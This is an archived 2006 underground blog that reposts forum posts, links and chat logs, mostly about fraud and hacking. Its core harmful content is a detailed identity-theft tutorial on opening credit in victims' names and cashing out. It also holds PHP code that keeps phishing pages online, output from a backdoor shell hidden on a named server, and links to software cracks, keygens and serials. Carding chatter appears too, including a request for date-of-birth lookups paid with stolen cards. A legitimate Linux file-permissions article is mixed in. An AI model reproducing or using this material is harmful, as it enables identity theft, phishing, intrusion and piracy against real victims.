Cha0s Computer Club: April 2006

Sunday, April 30, 2006

Portable 2006

Code:
http://www.megaupload.com/?d=A7AYVISP
conatins many nice portable programs some in spanish like( winamp,opera and many many......)
download it wont regret

http://www.meebo.com/

I really like this one

Quote:
http://www.meebo.com/

check it and u'll see

these im clients are included

AIM
ICQ
Yahoo! Messenger
Jabber
GTalk
MSN

Ps: the site has a long loading time before

List Code Ssn...56k Xpirence.

Friday, April 28, 2006

Hacks From Pax: Linux File & Directory Permissions Mistakes

Source: Pax Dickinson - Posted by: Pax Dickinson
Date: Monday, 27 June 2005
Features Greetings, gentle reader, and welcome to linuxsecurity.com and our new recurring series of articles on security related mistakes and how to avoid them. I'm your host, Pax Dickinson, and today we'll be reviewing basic Linux file and directory permissions and how to avoid some common pitfalls in their use, in this episode of Hacks From Pax.

One common mistake Linux administrators make is having file and directory permissions that are far too liberal and allow access beyond that which is needed for proper system operations. A full explanation of unix file permissions is beyond the scope of this article, so I'll assume you are familiar with the usage of such tools as chmod, chown, and chgrp. If you'd like a refresher, one is available right here on linuxsecurity.com.

I've witnessed systems administrators whose response to a user complaining about being denied access to a given file is to chmod 777 the file (or entire directory tree) in question. This is an absolutely disastrous security practice, the administrator has just granted write access to the file to any user on the system. Any compromised service will allow an attacker to modify the file, which could result in further access depending on the file in question. For example, an attacker gaining write access to a script that is occasionally run by root can parlay this seemingly minor security hole into full root access for himself.

* Never make files world-writable. Most files do not need to be world readable either.

* You can search for world-writable files under your current directory by issuing the following command:

find . -perm -2 -print

A related mistake is in the misuse of suid root binaries. These are programs which can be launched by a user but run with all the privileges of root. These programs are needed to perform tasks such as changing a user's password, since that requires a write to the system's password file which normally cannot be modified by anyone but root. A flaw that allows an attacker to gain a shell prompt in such a program can give an attacker root access to the system. These binaries should be carefully limited and must be kept up to date with appropriate security patches to minimize their risk. A common backdoor installed by successful attackers is a copy of /bin/sh set suid root. This can be run by any user on the system, without a password, and will result in full root access.

Suid root bits should never be set on a shell script, as they are impossible to make secure. In fact, because of their insecurity, modern versions of Linux do not allow their use and will not respect the suid or sgid bits on shell scripts.

* Don't try to make shell scripts suid root. If you must, investigate suidperl, which is safer but still should be used carefully and only when absolutely necessary.

* You can search your system for suid and sgid files by issuing the following command:

find / -type f -perm +6000 -ls

A close eye should also be kept on the file permissions within the /dev directory. Improper permissions here can allow users to read or write directly to hardware devices such as hard disks and network interfaces. Most devices should only be writable by root, and readable only by the group they belong to, with the exception of terminal devices (/dev/tty and /dev/pty), /dev/null and /dev/zero. Generally device files only exist within the /dev directory, but this is not required. An attacker my attempt to replicate a device file outside of this directory in order to gain access to otherwise protected data.

* You can search the /dev directory for world writable files by issuing the following command:

find /dev -perm -2 -print

* You can locate all device files on your system by issuing this command:

find / ( -type b -o -type c -o -type s -o -type p ) -ls

As you can see, the find command is extremely useful for keeping an eye on the file permissions of your system. A script that runs several find commands can be launched by cron periodically to monitor your file permissions. Combining this with an intrusion detection system, discussed later in this series of articles, will help you both implement and maintain a high security environment. It may be a cliche to say this, but security truly is a process and absolutely requires an ongoing commitment.

Stay secure, and I'll see you soon, in the next episode of Hacks From Pax!
--
Pax Dickinson has over ten years of experience in systems administration and software development on a wide variety of hardware and software platforms. He is currently employed by Guardian Digital as a systems programmer where he develops and implements security solutions using EnGarde Secure Linux. His experience includes UNIX and Windows systems engineering and support at Prudential Insurance, Guardian Life Insurance, Philips Electronics and a wide variety of small business consulting roles.

To anybody who wants to become a web developer/designer

This could help u a bit on your way imho

Read up:

http://www.w3schools.com/html/default.asp
http://www.w3schools.com/xhtml/default.asp
http://www.w3schools.com/css/default.asp
http://www.w3schools.com/js/default.asp
http://www.w3schools.com/php/default.asp
http://www.w3schools.com/sql/default.asp
http://www.w3schools.com/ajax/default.asp
http://www.w3schools.com/htmldom/default.asp

Read them in order to master the things that make our websites so great.

Generating "FAKE" traffic

Hi guys I am lately very much into affiliates and I am also doing pretty good with some sites and Webclicker however the biggest and best sites in my opinion dont work I just cant generate any hits to my referal pages, any idea what I could do ?? what is the problem anyone made the same experience I hope you guys can give me some tipps how to get Unique hits to my pages , it is really important for me !

is there maybe any better prog than webclicker(also tried I-FAKER but same results)??

THANKS IN ADVANCE FOR YOUR HELP

PEACE

Try these autosurfers (they're free, so there's no risk):
http://www.autosurf.cc/p/index.php?uid=w0rd
and
http://www.klick-banner-tausch.de/au...x.php?uid=w0rd
You get free credits when you start (2500 and 750 for the second one) so you can just keep resigning up or just surf

try www.gr8traffic.com
they send real traffic but not free

w0rd how can i use http://www.klick-banner-tausch.de/au...x.php?uid=w0rd

and like how many hits can i get daily from there

cheers

Thursday, April 27, 2006

Boleto.

Date of Birth or Background search

I know many websites from where I can get BG`s and DOB`s but i`m wasting alot of cc`s when i want to find alot of DOBs

For example:

With one cc.. i can get unlimited background reports from peoplefinders.com but not with DOB, if I want with DOB.. i will waste like 1 cc for 2-3 DOB finds.. I hope u get my ideea

The point is.. anyone know a good website from where I can easily get DOB? I can get background reports but I need DOB

If u know any other website beside these, please mention them! Thanks!

www.peoplefinders.com
www.zabasearch.com
www.intellius.com
www.privateeye.com

Security Utilities.

*Avast! Antivirus 4.6.774 Professional http://files.avast.com/iavs4pro/setupengpro.exe

37.
GData AntiVirusKit 2006
http://www14.enfull.com/GData.AntiVirusKit.exe

38.
*AVG Anti-Virus Professional 7.1.375 Build 716 http://download.grisoft.cz/softw/70/filedir/inst/avg71f_375a716.exe

39.
*BitDefender 9 Professional Plus http://download.bitdefender.com/resources/files/Download/en/bitdefender_prof_v9.exe

40.
*BitDefender 9 Internet Security CODEhttp://www.bitdefender.com/site/Download/downloadFile/367/EN/bitdefender_isecurity_v9.exe

41.
*CA eTrust EZ Antivirus 2005 7.1
ftp://ftp.ca.com/priv/trial/eav/eAV71Trial/eAV71eng.exe

42.
*Dr.Web 4.33.1.12292
ftp://ftp.drweb.com/pub/drweb/windows/drweb-433-win-en.exe

43.
*F-Prot Antivirus 3.16f
ftp://ftp.f-prot.com/pub/windows/fp-win_trial.exe

44.
*F-Secure Internet Security 2006
http://download.f-secure.com/estore/fs2006f.exe

45.
*Kaspersky Antivirus Personal Pro 5.0.388
http://d-eu-1h.kaspersky-labs.com/products/release/english/homeuser/kavpersonalpro/kav5.0.388_personalproen.exe

46.
*Kaspersky Personal Security Suite 1.1.53
http://downloads1.kaspersky-labs.com/products/release/english/homeuser/securitysuite/ks1.1.53_securitysuiteen.exe

47.
*McAfee VirusScan 10.0.27 Pro
http://www2.fixdown.com/soft/3709.asp?free=sdtel-downs

48.
*McAfee Internet Security 8.0.113.3
http://www2.fixdown.com/soft/23379.asp?free=sdtel-downs

49.
*NOD32 AntiVirus v2.51.20
http://u4.eset.com/eval/win/v2/nentenst.exe

50.
*Panda Titanium Antivirus Antispyware 2006 5.01.02
http://www18.enfull.com/titan2006.exe

51.
*Panda Platinum Internet Security 2006 10.01.02 http://www18.enfull.com/platis2006.exe

52.
*Trend Micro PC-Cillin Internet Security 2006 http://www.trendmicro.com/ftp/products/pccillin/pcc_14_win_en_us_1341.exe

53.
*ZoneAlarmŽ Antivirus 6.1.737
http://download.zonelabs.com/bin/free/1038_zl/zaAvSetup_61_737_000_en.exe

54.
*ZoneAlarmŽ Internet Security Suite
http://download.zonelabs.com/bin/free/1038_zl/zaSuiteSetup_61_737_000_en.exe

55.
*ZoneAlarmŽ Pro 6.1.737
http://download.zonelabs.com/bin/free/1038_zl/zapSetup_61_737_000_en.exe

56.
*Norton 2006 Products links
http://rapidshare.de/files/10754056/Norton2006links.txt.html

57.
*Agnitum Outpost Firewall Pro 3.5.641.458
http://dl2.agnitum.com/OutpostProInstall.exe

58.
*eTrust EZ Personal Firewall v5.5.114.000
http://tinyurl.com/8js7x

59.
*Kaspersky Antihacker 1.8.180
http://d-ru-1h.kaspersky-
labs.com/products/release/english/homeuser/securitysuite/ks1.1.53
_securitysuiteen.exe

60.
*Kerio WinRoute Firewall 6.1.4 Build 1044 http://download.kerio.com/dwn/kwf/kerio-kwf-6.1.4-1044-win.exe

61.
*Lavasoft Personal Firewall v1.0.543.5722
http://down.9down.com/software/Lavasoft.Personal.Firewall.v1.0.543.5722-DVT.rar

62.
*McAfee Personal Firewall Plus v7.1.113
http://www2.fixdown.com/soft/3565.asp?free=sdtel-downs

63.
*Webroot Desktop Firewall 1.3
http://sales.webroot.com/downloads/registered/links/dfsetup1_1841609629.exe

64.
*Sygate Personal Firewall Pro 5.6.2808 http://cdrom.wip.digitalriver.com/pub/bws/bws_49/pspf.msi

65.
*Ashampoo Antispyware 1.02
http://download17.ashampoo.com/m/ashampoo_antispyware102_sm.exe

66.
*eTrust PestPatrol Anti Spyware v5.0.2.3 CODEhttp://www14.enfull.com/PestPatrol.exe

67.
*Lavasoft AdAware Professional 1.06 http://www.lavasoft.de/auth/pjJacqRXrkUs/bUacgQXUfZUS/aawsepro.exe

68.
*SpyStopper Pro 4.40
http://www.itcompany.com/ssp.exe

69.
*WinPatrolPlus 9.8.1.0
http://www.winpatrol.com/wpsetup.exe

70.
*Spyware Doctor 3.5.1.498
http://www.pctools.com/downloads/sdsetup.exe

71.
*Webroot Spysweeper 4.5.9.709 http://sales.webroot.com/downloads/registered/links/sspsetup1_768375.exe

72.
*McAfee Antispyware 2.1.112
http://www14.enfull.com/McAfee.AntiSpyware.exe

73.McAfee Spamkiller 7.0.23
http://www2.fixdown.com/soft/2250.asp?free=cqoltel-downs

74.
*Steganos Antispyware 2006
ftp://file.steganos.com/software/saspy2006int.exe

75.
*Spy Emergency 2005 2.0.320
http://www.spy-emergency.com/download/se-setup.exe

76.
*TrendMicro Antispyware 3.0 http://www.trendmicro.com/ftp/products/tmas/tmasv30-us.exe

77.
*XoftSpy 4.22.012
http://paretologic.com/downloads/XoftSpy_setup.exe

78.*ZoneAlarmŽ Anti-Spyware 6.1.737 http://download.zonelabs.com/bin/free/1038_zl/zaasSetup_61_737_000_en.exe

PC Security keycracks
http://www.megaupload.com/?d=7WEVQQOC
http://rapidshare.de/files/10816544/PC_Security_keycracks.rar.html

Addtional cracks
Spyware Doctor 3.5.1.498 crack
http://rapidshare.de/files/13611855/SD_3.5.1.498crack.rar.html

Ashampoo Antispyware keygen
http://rapidshare.de/files/13911394/AAkeygen.rar.html

Spy Stopper Pro 4.40 crack
http://rapidshare.de/files/11484596/SpyStopper.Pro.v4.40_crack.rar.html

BitDefender 9 Internet Security keygens

http://rapidshare.de/files/13294414/BDIS9c.rar.html

Serials for Antiviruskit 2006:

Name: fischer2815 Serial:7j1n1e

Name: alfaisal Serial:84C5K8

Sorry i put all info whitout code for website

Outpost Firewall.

The latest version of Outpost Firewall Pro is even more powerful and easy to use than its predecessors.

Firewall configurations can now be created and updated automatically on user acceptance, while the actual configuration of the firewall is handled remotely in the background by Agnitum security professionals.

The anti-spyware plug-in now ensures that vulnerable areas of the PC are constantly monitored for possible spyware activity. And the logging system is now more intuitive, customizable, and easy to use.

Let’s see in detail what’s been added.

Automatically generate and apply configurations
With this version of Outpost, Agnitum introduces ImproveNet. ImproveNet is a network community that brings Outpost users and Agnitum engineers together to optionally share configurations and enable everyone to benefit from universally-applicable Internet access security rules. By participating in the ImproveNet service, users can adjust their application access rules to protect against the latest threats. These settings are created, transferred and applied automatically if this feature is enabled, so that users no longer need to worry about how to respond to the next action prompt window – because ImproveNet adjustments mean that the window won’t appear in the first place!

The principle behind the ImproveNet service lies in security experts evaluating the preset access rules in use by the community of Outpost Firewall Pro users. After the rule is checked for validity and approved, it is automatically distributed to all other users through the Agnitum Update tool. Because new rules are created and processed on a daily basis, users will have a continuously updated set of access rules for the majority of existing Internet-enabled programs, sparing themselves the need to manually create their own rules and removing the possibility of errors in rule structure and application.

Smart spyware sensor
Spyware remains a serious threat, and smart but not overly restrictive protection should always be in place. That’s why we decided to incorporate our spyware sensor into Outpost’s active connections monitor. Here’s how it works: when a new application requests network access for the first time, it is automatically checked for spyware. In this way, no malware can cause damage and computer resources are kept at optimal levels in those instances when continuous spyware protection is not needed – for example, if the computer is used to play a demanding PC game.

Flexible logging system
Outpost’s improved logging system now uses fewer system resources and provides clearer logs. The program can now log specific application activities by defining log exclusions for a particular Internet or network activity. The logging system includes optimized default settings, with disabled logging for specific rules to allow or deny a connection. Advanced users will appreciate the flexibility of being able to create custom logging exclusions for peer-to-peer or NetBIOS communications, which are known to generate significant number of log records.

All the above improvements have been implemented in furtherance of Agnitum’s mission – to ensure that the Internet is a safe place for everyone without imposing unnecessary or cumbersome restrictions on the user.

Release date: April 20, 2006
Version: 3.51 (748.462)

Following is a list of new features:

o New flags in outpost.ini to control rules auto update settings

The following issues are fixed (only significant ones are listed):
o New presets for system rules and basic applications
o Outpost Plug-in SDK updated
o Third-party plug-ins updated to be compatible with Outpost 3.51
o Rules Wizard prompt was displayed too slowly
o Interface and localization issues
o Sometimes CPU load reached 100 % on Win98
o Some Anti-Spyware plug-in issues
o Some presets issues
o Besides, a lot of stability and usability improvements are performed.

Homepage:
http://www.agnitum.com/products/outpost/index.php

Application + Key File
http://rapidshare.de/files/18497250/OPF.351._748.462_.rar.html
or
http://www.sendspace.com/file/x9f98a

Microsoft "Staining" Products

Better not download the new Genuine Update...
Quote:
http://star-techcentral.com/tech/story.asp?file=/2006/4/25/prodit/14029720&sec=prodit

HYIP - E-Gold Games

http://www12.megaupload.com/files/b47b152b45c63fe6ad7a4903c1f4b5f5/HYIP%20-%20E-Gold%20Games.zip

Hyip stat

http://www18.megaupload.com/files/9ca991ed595432e45c59f62c3b85bc61/HYIPStat.rar

Ebay mail extractor

I don't if it works now,i used it half year ago,but was still working.
http://www07.megaupload.com/files/11f1413a87e0485e54f602d866e3bb8b/e-mail%20extractor.rar

Automatic replacement.

OK guys, for example I have the following links:

http://www.domain.com/forums/sendmessage.php?do=mailmember&u=???
http://www.domain.com/forums/sendmessage.php?do=mailmember&u=???
http://www.domain.com/forums/sendmessage.php?do=mailmember&u=???
http://www.domain.com/forums/sendmessage.php?do=mailmember&u=???
http://www.domain.com/forums/sendmessage.php?do=mailmember&u=???

How can I automatically replace the ??? with the numbers from 1 to 5?
You would say, why do it automatically fill it out yourself, but we are talking about 20000 links here... Any ideas?

PHP CODE
for ($i=1;$i<=20000;$i++) {
echo "http://www.domain.com/forums/sendmessage.php?do=mailmember&u=".$i."
";
}
?>

Wednesday, April 26, 2006

Caloter...

Session Start: Wed Apr 26 11:38:04 2006
Session Ident: Dead_Fish
[11:38:06] ei Dead_Fish
[11:38:10] kd minha grana seu caloter?
[11:38:10] fdp
[11:38:14] /Whois de: Dead_Fish [identificado]
[11:38:14] Endereço:... Dead@201.2430b3da1383ffec.FullNetwork.Org [organização não lucrativa]
[11:38:14] Nome:....... Dead
[11:38:14] Servidor:... irc.FullNetwork.org (irc.FullNetwork.org)
[11:38:14] Canais:..... #full @#Priv8 @#bankers #cardding +#ATH #BB
[11:38:14] Inativo:.... 19s
[11:38:14] Entrou em:.. Quarta, 26 de Abril de 2006 às 10:25:32
[11:38:14] Fim do /Whois de: Dead_Fish
[11:38:14] fala
[11:38:16] ti conheço ?
[11:38:20] cef_na_mao
[11:38:23] ¬¬
[11:38:24] kd ein?
[11:38:27] cara poxa
[11:38:27] aff
[11:38:32] tanto tu dizendo q n era caloter
[11:38:33] :/
[11:38:40] eu confiei em ti rapaiz
[11:38:51] /Whois de: Dead_Fish [identificado]
[11:38:51] Endereço:... Dead@201.2430b3da1383ffec.FullNetwork.Org [organização não lucrativa]
[11:38:51] Nome:....... Dead
[11:38:51] Servidor:... irc.FullNetwork.org (irc.FullNetwork.org)
[11:38:51] Canais:..... #full @#Priv8 @#bankers #cardding +#ATH #BB
[11:38:51] Inativo:.... 3s
[11:38:51] Entrou em:.. Quarta, 26 de Abril de 2006 às 10:25:32
[11:38:51] Fim do /Whois de: Dead_Fish
[11:38:58] ein?como vai ficar? Dead_Fish
[11:39:05] Cancelado
[11:39:09] eu peguei calote daquele fdp
[11:39:11] ;(
[11:39:14] ele nao mando a minha parte tmb
[11:39:14] sim cara
[11:39:15] =~~
[11:39:18] eu n tenho nda a v
[11:39:22] fiz foi com vc
[11:39:22] bl
[11:39:23] :)
[11:39:23] po .
[11:39:26] eu ti ligava
[11:39:30] sim e minha grana
[11:39:32] e tu nao atendia
[11:39:33] quando vai mandar?
[11:39:40] quando eu virar.
[11:39:41] de boa.
[11:39:43] -NickServ- Ultimo Horario visto: 26 Abr 10:39:30 2006 EDT
[11:39:44] se preoculpa nao
[11:39:49] me manda ate quanto
[11:39:51] quero saber
[11:39:52] q nao ta perdido o teu dinheiro nao
[11:39:56] o teu dinheiro certo
[11:40:02] quanto era o trato?
[11:40:02] te dou prazo ate amanha
[11:40:03] ;)
[11:40:06] 470
[11:40:27] amanha ?
[11:40:29] maxo nao
[11:40:32] quando eu virar eu mando.
[11:40:42] quando tu virar?
[11:40:46] q conversa é essa rapaiz
[11:40:54] te vira... quero ate sexta estourando
[11:40:54] aff
[11:40:55] to avisando
[11:40:58] meu amigo
[11:41:00] ja ta eh com semanas
[11:41:05] isso eh conversa sua
[11:41:09] conversa de caloter
[11:42:14] x7x Dead_Fish@#full!expulso por D-P-F: Requested
[11:42:32] /Whois de: Dead_Fish [identificado]
[11:42:32] Endereço:... Dead@201.2430b3da1383ffec.FullNetwork.Org [organização não lucrativa]
[11:42:32] Nome:....... Dead
[11:42:32] Servidor:... irc.FullNetwork.org (irc.FullNetwork.org)
[11:42:32] Canais:..... @#Priv8 @#bankers #cardding +#ATH #BB
[11:42:32] Inativo:.... 0s
[11:42:32] Entrou em:.. Quarta, 26 de Abril de 2006 às 10:25:32
[11:42:32] Fim do /Whois de: Dead_Fish
[11:43:01] /Whois de: Dead_Fish [identificado]
[11:43:01] Endereço:... Dead@201.2430b3da1383ffec.FullNetwork.Org [organização não lucrativa]
[11:43:01] Nome:....... Dead
[11:43:01] Servidor:... irc.FullNetwork.org (irc.FullNetwork.org)
[11:43:01] Canais:..... @#Priv8 @#bankers #cardding +#ATH #BB
[11:43:01] Inativo:.... 3s
[11:43:01] Entrou em:.. Quarta, 26 de Abril de 2006 às 10:25:32
[11:43:01] Fim do /Whois de: Dead_Fish
[11:43:13] /Whois de: Dead_Fish [identificado]
[11:43:13] Endereço:... Dead@201.2430b3da1383ffec.FullNetwork.Org [organização não lucrativa]
[11:43:13] Nome:....... Dead
[11:43:13] Servidor:... irc.FullNetwork.org (irc.FullNetwork.org)
[11:43:13] Canais:..... @#Priv8 @#bankers #cardding +#ATH #BB
[11:43:13] Inativo:.... 0s
[11:43:13] Entrou em:.. Quarta, 26 de Abril de 2006 às 10:25:32
[11:43:13] Fim do /Whois de: Dead_Fish
[11:45:13] seu caloter
[11:49:40] cara tu eh sinico
[11:49:41] pqp

Tuesday, April 25, 2006

hackertools

http://www.hackertools.dl.am/

lok-crew

http://www.lok-crew.de/

Cell Phone Tracking

http://www.fonefinder.com/Introduction.html
http://world-tracker.com/

D.O,M

Monday, April 24, 2006

Funny.

http://www.youtube.com/watch?v=C8rjr4jmWd0&search=humor

IDTheft Tutorial

Identity Theft:

Disclaimer: This is for informational purposes only. The author takes no responsibility regarding how other people use this information. Do not attempt the following because its illegal and wrong and bad….blah blah blah….

Ok, so you have a drop and wanna pull a good amount of money through it. Heres some good ideas.

You have information on somebody, ss, dob, and prior addresses are a must. Also highly recommended are credit reports and dl number. You can get around the dl# without problems. But if you don’t have a credit report, you should at least know one bank or credit card that the mark uses. (this comes in handy if the credit department calls to verify your application.)

OK…
1. Get a prepaid/VOIP phone number to be used as a business number.
2. Get a primary phone: One of the following is ideal: A landline with the local utility company if your drop is an apartment or a cell phone under the marks name. If you’re getting a cell you’ll need an ID, but you may get away with calling a provider and giving them fake DL# to activate a phone u bought previously. If these arnt an option just get another prepaid phone. Either way make sure the area code matches the drops location.

-At the end of the month the credit bureaus update their databases (so I heard). You’re going to want the marks address changed to your drop on their files. This is why you want a cellular plan under his name, plus it actually saves you money as opposed to buying a prepaid with minutes. If you can’t get a cell/landline, you can get a prepaid card under marks name (one that reports to credit bureaus). Pay with a money order. This is a must if you don’t have a credit report.

3. Get credit… 2 options….call credit companies and get mail in applications or call the applications phone number directly. Be sure to mention that you recently moved and give them the prior address of the mark.

- If your mark is within driving distance of yourself it would be advantageous to dumpster dive/ check his mail. If you can give them the numbers of a preapproved application, you’re golden. Also, this may give you a clue to what cell phone provider he is using, what banks he has, and possibly who is his employer.
- Although more risky, you may use one drop for more than one mark. However, do not apply to the same banking institutions under different names.
- I have generally found AEX and Discover to be more difficult as they sometimes send a letter to the marks prior address informing him of the recent application. (if anyone has more banks to avoid/ hit up/ or other useful facts….post them NOW)
- After 3 credit inquiries into one bureau your chances of getting approval from a following application drops substantially.
- Theoretical max applications per person is 9, 3 inquiries into each of the 3 bureaus. You can use this sight to help you determine what banks use which CRA….but it’s not always 100% and it sucks going through this list. http://creditboards.com/forums/index.php?showtopic=37366
- If you insist on applying online, be sure that you buy some email addresses with personalized domain names. Use proxies as always, but also make sure that the IP is geographically close to drop. AOL may work too.

4. Stay by the phones with all information at hand, they call anywhere from same day to a week later (usually within 2-3 days though). They have been known to ask: prior addresses 90%, DOB, SS, current address, schools, other banks/cards and their limits, driving directions to addresses, Dl#s, loan/mortgage information, Jr./Sr., relatives + their phone #s, employer and employer’s address (you are best off using a real business name and address and give them the number of your 2nd cell phone for your current employer).
- Practice asking yourself these questions, so when you get a random phone call you will be ready to answer without hesitation.
- If you get prepaid phones…I have found that they don’t do call forwarding….so you have to sit there with a bunch of cells. It is probably best to get all the phone lines to forward to one phone so you arnt confined to your home for a week.

5. Get your applications, it is good to check for approval before going to your drop…but not all banks allow this. You may need to send them approving documents, (use Photoshop). Activate the cards as soon as you get them and make several purchases under 300$. Be sure to call with the phone that you used in the application as primary number.

6. Now to turn plastic into paper. There are countless ways of doing this, but I’ll describe two I have found to be practical and profitable.
- Instore/ order goods to your drop. If your drop is an apartment and you are looking to deliver goods that require signing, you can get a MBE box and do a COB on your card. This will be easy as you have the MMN (that you made up…this isn’t checked against any database) and all other relevant info. Also wait for the pin to arrive within a week or so and use ATMs. But note that there is usually a daily limit, and meeting that limit day after day after getting your card will likely get your card shut down.
- Wouldn’t recommend WU unless you have a lot of info on mark as well as good phone skills.
- It takes money to make money. If you have set up a sufficient amount of cards and bank accounts you can do the following. I have found this to be the most profitable for a given period of time. $/T. Simply use the convenience checks that arrive shortly after the cards do. Mail them to the bank accounts you set up and ATM the money out. You would want to set up either 2 CC for each Bank acc, or go 50/50. While you’re doing this you should have applied for a merchant account on the bank accounts. This way when you use up all the “cash advance” limits on the cards…you can continue to pull the rest of the money out VIA the merchant accounts. When you apply for the account, be sure to let them know your estimated volume (fewer orders, large deposits, [construction, selling motorcycles, organs, whatever]). Then use the cards to deposit funds into the merchant accounts. When doing this though, do not allow all your cards to be used with any particular merchant account. You don’t want all your cards to be linked together. The FBI is estimated to begin investigations at 50K plus and gang related crime. If you do not allow all your crime to be linked together, you will be better off. This goes for cell phones, drops, email addies.

7. When the cards have no money, you should have made at least 1000% profit on your initial (500ish$) investment in no time. At this point you have some good merchant accounts hopefully still active. Just buy some cc#s and see how much more $ you can pull through the accounts. You can also do a COB balance transfer to these bank accounts. Rip off some people on eBay with Paypal or checks (Least recommended; least profitable, pisses LE off, gets more people actively involved in your fraud.) Apply for loans, cash loans, or cashout of anything. Your options are limited only by your imagination once you’re at this stage. But do not forget that the most valuable thing you possess is freedom and that greed fogs the mind of logical thought. Don’t get greedy and don’t brag to your friends, wives, mistresses, girlfriends, dogs.

None of this information is new or revolutionary. It is a basic outline of one way money can be made illegally. Many details have been omitted; if you have questions post them or PM me. Also if you have something to add to this please do….what banks are good?...what merchant providers?....how aggressively to pull $ from cards?....good techniques/ tricks to better T/$ ratio…..
trial and error is a bitch…. share your experiences so we can keep the flame burning.
-“Education is not filling a bucket, but lighting a fire.” William Butler Yeats
__________________
-Take calculated risks. That is quite different from being rash. -General George S. Patton

-Life is a tragedy for those who feel, and a comedy for those who think. -La Bruyere

Anzac.

Scams 2006...lol

http://membres.lycos.fr/irc0074u/

Country Codes.

http://ftp.ics.uci.edu/pub/websoft/wwwstat/country-codes.txt

m0rtix.

,--. | o
,-.-.| |,---.|--- .. ,
| | || || | | ><
` ' '`--'` `---'`' `

PsychoPhobia Backdoor v3 by m0rtix is starting...OK, pid = 20116
Shell on: 9997 User: apache@ UID: 48
Name: /sbin/syslogd (Masked in PS! ) v: = Linux notos.maestrodigital.net 2.6.14-1.1656_FC4

Rootab !! use: expand_stack, Krad(if 2004), Krad2(if 2004), Krad3 !
,--. | o
,-.-.| |,---.|--- .. ,
| | || || | | ><
` ' '`--'` `---'`' `

PsychoPhobia Backdoor v3 by m0rtix is starting...OK, pid = 20116
Shell on: 9997 User: apache@ UID: 48
Name: /sbin/syslogd (Masked in PS! ) v: = Linux notos.maestrodigital.net 2.6.14-1.1656_FC4

Rootab !! use: expand_stack, Krad(if 2004), Krad2(if 2004), Krad3 !

Sunday, April 23, 2006

A short coding tip on how-to keep your scams alive much much longer

Create page for redirect and insert this code:

function scam_exists($strURL) {
$data = file_get_contents($strURL);
return $data;
}

$conf_word = "exists"; // confirmation word for checker to see if the scam is still alive

$url1 = "hxxp://www.scam1.com/?session=31337"; // first scam url
$url2 = "hxxp://www.scam2.com/?session=31337"; // second scam url
$url3 = "hxxp://www.scam3.com/?session=31337"; // third scam url (actually you can add as much as you like, but don't forget to add equal number of "elseif"

if(scam_exists($url1) == $conf_word) {
$url1 = str_replace("?session=31337","", $url1); // str_replace("?session=31337","YOU_CAN_PUT_HERE_WHATEVER_YOU_NEED_TO", $url1);
header("Location: $url1");
}

elseif(scam_exists($url2) == $conf_word) {
$url2 = str_replace("?session=31337","", $url2);
header("Location: $url2");
}

elseif(scam_exists($url3) == $conf_word) {
$url3 = str_replace("?session=31337","", $url3);
header("Location: $url3");
}

else {
@mail('your@email.com','Scams report','All your scams are offline'); // or send mail to you if all scams are offline
header("Location: hxxp://editme.com"); // any site where people should be redirected if all scams are offline
}
?>

Now in you scam page before all other code add:

$ses = "31337";
$session = $_GET['session'];
if($session == $ses) { echo "exists"; }
else {
?>

And add this in the end of your scam after all code:

}
?>

Now upload all scam pages and redirect page to separate places. In your spam add redirect page's url. It will check if your scams are responding to query and if any of them aren't online it will redirect to working scam.

Actually, this would be a little more efficient:

$scams = array('hxxp://www.scam1.com/index.php', // If it's a domain and not a request to a page
'hxxp://www.scam2.com/', // (e.g. index.php) add a slash (/) to the end.
'hxxp://www.scam3.com/');

foreach ($scams as $scam) {
if (file_get_contents($scam."?session=31337") == "exists") {
Header("Location:$scam"); exit;
}
}

@mail('your@email.com','Scam Report','Your scams are down!');
Header("Location:hxxp://www.backupurl.com/");
?>

And in your scam pages:

Code:

Number 2

if($_GET['session'] == 31337)
{
echo 'true';
exit;
}

?>

It is more easier to put this code in testmyscam.php for example nad then in redirection script

Code:
function scam_exists($strURL) {
$data = file_get_contents($strURL);
return $data;
}

$conf_word = "exists"; // confirmation word for checker to see if the scam is still alive

$url1 = "hxxp://www.scam1.com/testmyscam.php?session=31337"; // first scam url
$url2 = "hxxp://www.scam2.com/testmyscam.php?session=31337"; // second scam url
$url3 = "hxxp://www.scam3.com/testmyscam.php?session=31337"; // third scam url (actually you can add as much as you like, but don't forget to add equal number of "elseif"

if(scam_exists($url1) == $conf_word) {
$url1 = str_replace("testmyscam.php?session=31337","", $url1); // str_replace("?session=31337","YOU_CAN_PUT_HERE_WHATEVER_YOU_NEED_TO", $url1);
header("Location: $url1");
}

elseif(scam_exists($url2) == $conf_word) {
$url2 = str_replace("testmyscam.php?session=31337","", $url2);
header("Location: $url2");
}

elseif(scam_exists($url3) == $conf_word) {
$url3 = str_replace("testmyscam.php?session=31337","", $url3);
header("Location: $url3");
}

else {
@mail('your@email.com','Scams report','All your scams are offline'); // or send mail to you if all scams are offline
header("Location: hxxp://editme.com"); // any site where people should be redirected if all scams are offline
}
?>

Just put testmyscam.php in your scam dir, no need for puting scam in scam page Smiley

Xt0rti0n-Team Business Week.

# # # #
# # # #
# ## #### ## #
## ## ###### ## ##
## ## ###### ## ##
## ## #### ## ##
### ############ ###
########################
##############
######## ########## #######
### ## ########## ## ###
### ## ########## ## ###
### # ########## # ###
### ## ######## ## ###
## # ###### # ##
## # #### # ##
## ##

woke up this morning

You woke up this morning
Got yourself a gun,
Mama always said you'd be
The Chosen One.

She said: You're one in a million
You've got to burn to shine,
But you were born under a bad sign,
With a blue moon in your eyes.

You woke up this morning
All the love has gone,
Your Papa never told you
About right and wrong.

But you're looking good, baby,
I believe you're feeling fine, (shame about it),
Born under a bad sign
With a blue moon in your eyes.

You woke up this morning
The world turned upside down,
Thing's ain't been the same
Since the Blues walked into town.

But you're one in a million
You've got that shotgun shine.
Born under a bad sign,
With a blue moon in your eyes.

When you woke up this morning everything you had was
gone. By half past ten your head was going ding-dong.
Ringing like a bell from your head down to your toes,
like a voice telling you there was something you should
know. Last night you were flying but today you're so low
- ain't it times like these that make you wonder if
you'll ever know the meaning of things as they appear to
the others; wives, mothers, fathers, sisters and
brothers. Don't you wish you didn't function, wish you
didn't think beyond the next paycheck and the next little
drink' Well you do so make up your mind to go on, 'cos
when you woke up this morning everything you had was gone.

When you woke up this morning,
When you woke up this morning,
When you woke up this morning,
Mama said you'd be the Chosen One.

When you woke up this morning,
When you woke up this morning,
When you woke up this morning,
You got yourself a gun.

Cyber-Crime.

Look at this, there is a forum for researching cyber crime hehe.
http://forum.crime-research.org/

Saturday, April 22, 2006

System Of A Down - Lonely Day.

VNC Port.

http://www.iss.net/security_center/advice/Exploits/Ports/

5800 VNC
5801 VNC
5900 VNC
5901 VNC

Default Passwords.

